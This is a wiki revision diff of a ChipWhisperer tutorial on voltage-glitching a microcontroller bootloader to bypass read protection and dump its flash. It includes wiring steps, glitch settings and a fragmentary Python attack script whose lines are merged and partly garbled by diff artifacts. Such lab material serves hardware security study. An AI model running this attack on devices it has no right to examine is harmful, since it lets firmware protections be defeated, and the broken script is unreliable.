Approved_users, administrator
366
edits
| As of August 2020 the site you are on (wiki.newae.com) is deprecated, and content is now at rtfm.newae.com. |
Changes
→Method 2: Stand Alone Scripting for Stopping Glitch when Success & Dumping Memory
# Connect pin 3 of UEXT (TXD) to pin 10 on the CW-Lite
# Connect pin 4 of UEXT (RXD) to pin 12 on the CW-Lite
# Connect RST (the 3 header pins soldered on) to pins 5 (nRST) and 14 (GPIO3) or 16 (GPIO4) on the CW-Lite
# Finally, attach an SMA cable between the one you added to the board and the GLITCH connector on the CW-Lite. If you'd like instead you can also use a SMA Tee to do both measurement & glitch.
=== Decoding UU Encoded Data ===
[https://en.wikipedia.org/wiki/Uuencoding The UU Encoding Wikipedia page] is a good resource for UU encoding. Python includes functions for decoding UU strings to binary in the binascii module. Documentation can be found [https://docs.python.org/2/library/binascii.html here]. Note that the bootloader uses a tilde backtick ('`') for 0 instead of a space (' '), meaning you need to replace the tildes backticks with spaces in your UU Encoded string before decoding. Also note that the first character of a UU Encoded line is the length of the line+ 32. This needs to be at the start of the line when it is passed to the decoding function. For an example, see the script at the bottom of this page.
== Setting up the Glitch Method 1 - ChipWhisperer Capture GUI ==
=== Firmware Setup ===
scope.adc.offset = 0
scope.clock.adc_src = "clkgen_x1"
scope.trigger.triggers = "tio3tio4"
scope.io.glitch_lp = True # this works, but doesn't update the GUI checkbox
scope.io.hs2 = None
</syntaxhighlight>
=== Using the Glitch Explorer ===
The last thing we need to do before beginning our glitches is to setup the Glitch Explorer to detect successful glitches. Since the bootloader sends back a specific error message when read protect is enabled, we can use that to tell if our glitch was successful or not. For example, you could search the string for "\r\n19\r\n" for a normal response, and search for "\r\n0\r\n for a successful response. Setup your Acquisition Settings to run for a while, and check back for successful glitches. If you're lucky, you'll find some glitches and can start reading flash memory.
== = GUI or Stand-Alone === This tutorial is split into two parts - the GUI part (here) and a stand-alone demo. You may find the stand-alone demo more useful and easier to run on your own, and is continued before. Note that the stand-alone demo improves reliability by running the glitch with a 200 MHz CLKGEN frequency, giving you double the width and offset precision. In our testing that worked on a wider range of devices with the ChipWhisperer. == Method 2: Stand Alone Scripting for Stopping Glitch when Success & Dumping Memory ==
The easiest way to fully automate the breaking/dumping process is to use ChipWhisperer entirely without the GUI. This involves making a loop running through what you would normally do in the GUI (so resetting, arming the scope, setting up the bootloader, etc). An example script that breaks the bootloader and dumps the flash memory in various formats (UU encoded, binary, and ASCII encoded) is shown below. This script is also much faster than the GUI, so it much better for breaking the bootloader as well.
For use without the CW GUI
"""
from __future__ import print_function
import sys
import numpy as np
import chipwhisperer as cw
from tqdm import trange
logging.basicConfig(level=logging.NOTSET)
scope = cw.scope()
target = cw.target(scope)
#Create and register glitcher
# Original attack done with 100 MHz clock - can be helpful to run this
# 2x faster to get better resolution, which seems useful for glitching certain boards
freq_multiplier = 2
#Initial Setup
scope.adc.offset = 0
scope.clock.adc_src = "clkgen_x1"
scope.trigger.triggers = "tio3tio4"
scope.io.glitch_lp = True
scope.io.hs2 = None
scope.io.tio2 = "serial_tx"
scope.adc.basic_mode = "rising_edge"
scope.clock.clkgen_freq = 100000000* freq_multiplier
scope.glitch.clk_src = "clkgen"
scope.glitch.trigger_src = "ext_single"
#wait for full response, since we need to make sure we don't throw off baud calc
self.read_line(0)
self.serial.write("Synchronized\r\n")
self.read_line(10)
#about these unexpected returns
if "19" not in s:
print ( "Unexpected error code " + s)
return False
def dump_flash(self, start_addr = 0, length = 0x8000, rd_len = 24):
if start_addr % 4:
print ("Address not 4 byte aligned!")
return -1
if length % 4:
print ("Length not 4 byte aligned!")
return -1
bin_file = open("bin_flash.bin", "wb")
print ("Doing loop") for i in rangetrange(start_addr, start_addr + length - 1, rd_len):
self.serial.write("R {:d} {:d}\r\n".format(i, rd_len))
err = self.read_line()
if "13" in err:
#addr err
print ("addr error: addr = {:d}".format(i))
return -1
flash = self.read_line(0)
if flash: data_len = ord(flash[0]) - 32 if rd_len != data_len: print ("Unexpected data_len {:x}, expected {:x}".format(data_len, rd_len)) print ("Actual flash: " + flash)
Range = namedtuple("Range", ["min", "max", "step"])
offset_range = Range(5180*freq_multiplier, 51835185*freq_multiplier, 1)repeat_range = Range(98*freq_multiplier, 1315*freq_multiplier, 1)
scope.glitch.repeat = repeat_range.min
print ("Entering glitch loop")
# it may take quite a few cycles to get a glitch, so just attempt until we get it
s = glitcher.get_read_string()
print ( "Read string: " + s) print ( "Offset = {:04d}, Repeat = {:02d}".format(scope.glitch.ext_offset, scope.glitch.repeat))
if glitcher.check_err_rtn(s):
print ("Success!")
glitcher.dump_flash()
cleanup_exit()
scope.glitch.repeat += repeat_range.step
def cleanup_exit():
scope.dis()
target.dis()
exit()
cleanup_exit()
</syntaxhighlight>
